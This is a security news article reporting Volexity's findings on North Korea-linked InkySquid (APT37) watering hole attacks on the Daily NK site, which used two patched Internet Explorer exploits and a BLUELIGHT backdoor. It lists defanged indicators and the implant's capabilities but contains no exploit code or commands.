NK-linked InkySquid APT leverages IE exploits in recent attacks

North Korea-linked InkySquid group leverages two Internet Explorer exploits to deliver a custom implant in attacks aimed at a South Korean online newspaper.

Experts from cybersecurity firm Volexity reported that North Korea-linked InkySquid group (aka ScarCruft, APT37, Group123, and Reaper) leverages two Internet Explorer exploits to deliver a custom backdoor in watering hole attacks aimed at the Daily NK South Korean online newspaper (www.dailynk[.]com).

APT37 has been active since at least 2012, it mainly targeted government, defense, military, and media organizations in South Korea.

The watering hole attacks on the Daily NK was conducted from March 2021 until early June 2021.

“The use of recently patched exploits for Internet Explorer and Microsoft Edge will only work against a limited audience.” reads the post published by Volexity. “Attackers will still have some success, however, and have a good chance of avoiding detection based on the following attributes of their attack:

• Clever disguise of exploit code amongst legitimate code, making it harder to identify
• Only allowing exploitable user-agents access to the exploit code, making it difficult to identify at scale (such as through automated scanning of websites)
• Use of innovative custom malware, such as BLUELIGHT, after successful exploitation using C2 mechanisms which are unlikely to be detected by many solutions”

The researchers discovered a suspicious code that was loaded via www.dailynk[.]com to malicious subdomains of jquery[.]services. Below some examples of URLs used to load malicious code:

• hxxps://www.dailynk[.]com/wp-includes/js/jquery/jquery.min.js?ver=3.5.1
• hxxps://www.dailynk[.]com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2

The attackers modified the content of legitimate files used by the website and included the code to redirect users to load malicious JavaScript from the attacker-owned domain jquery[.]services. The attackers included the malicious code only for short periods of time making hard the detection of the attack.

The threat actors leverage exploits for two Internet Explorer vulnerabilities, tracked as CVE-2020-1380 and CVE-2021-26411, that were respectively patched in August 2020 and March 2021.

CVE-2020-1380 is a Scripting Engine Memory Corruption Vulnerability that received a CVSS score of 7.5, while the CVE-2021-26411 was an Internet Explorer Memory Corruption vulnerability that received a CVSS score of 8.8.

Both vulnerabilities have been actively exploited in the wild by threat actors and the CVE-2021-26411 was already exploited by North Korean APT groups in attacks aimed at security researchers working on vulnerability research in January.

According to the experts, BLUELIGHT is used as a second-stage payload after the successful delivery of the initial Cobalt Strike payload.

BLUELIGHT was used to gather intelligence on the infected system and to provide remote access to the attackers, it supports the following commands:

• Execute downloaded shellcode.
• Download and launch an executable, then upload program output.
• Harvest cookies and a password database for supported browsers.
  — Supports: Win7 IE, Win10 IE, Edge, Chrome, and Naver Whale
• Recursively search a path and upload file metadata (timestamps, size, and full path).
• Spawn a thread to recursively search a path and upload files as a ZIP archive.
• Terminate the file upload thread.
• Uninstall the implant.

“While SWCs are not as popular as they once were, they continue to be a weapon in the arsenal of many attackers. The use of recently patched exploits for Internet Explorer and Microsoft Edge will only work against a limited audience. Attackers will still have some success, however, and have a good chance of avoiding detection base” concludes the experts.

Follow me on Twitter: @securityaffairs and Facebook

[adrotate banner=”9″]

[adrotate banner=”12″]

Pierluigi Paganini

(SecurityAffairs – hacking, InkySquid)

[adrotate banner=”5″]

[adrotate banner=”13″]